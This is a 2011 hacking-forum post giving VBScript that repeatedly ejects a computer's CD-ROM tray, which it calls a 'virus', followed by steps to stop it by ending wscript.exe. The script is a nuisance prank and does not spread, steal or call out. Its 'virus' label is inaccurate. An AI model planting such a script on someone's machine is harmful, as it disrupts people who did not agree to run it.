goldendragon | Date: Saturday, 2011-11-26, 11:09 AM | Message # 1 |
Sergeant
Group: Moderators
Messages: 23
Awards: 0
Reputation: 1
Status: Offline
| There are many viruses which can do scary and annoying things, in that list there is a virus code which is also included in some Trojan scripts which can repeatedly open your CD-ROM. The Virus is written in VB.
To create the Virus Follow the steps given below : 1.) Open notepad and copy the below script :
Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom
End If
2.) Save it as Virus.vbs where Virus in name of file, you can choose anything you want.
3.) This Virus will only open your CD-ROM once. but if you want to make it really scary then you can use the Following code, Which will repeatedly open the CD-ROM every time you close it.
Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom
loop End If
But you can find this code on many sites, creation of virus is not only important for a hacker, a hacker must know how to delete and stop virus from exploiting. So now how to delete or stop this virus :
1.) Goto Task Manager by pressing Ctr+Alt+Delete
2.) Now in the Process Tab, there is a Process named wscript.exe , Right Click on that process and Choose End Process. You have successfully Protected your computer and stopped the Virus.
Enjoy learning Hacking!!
|
|
| |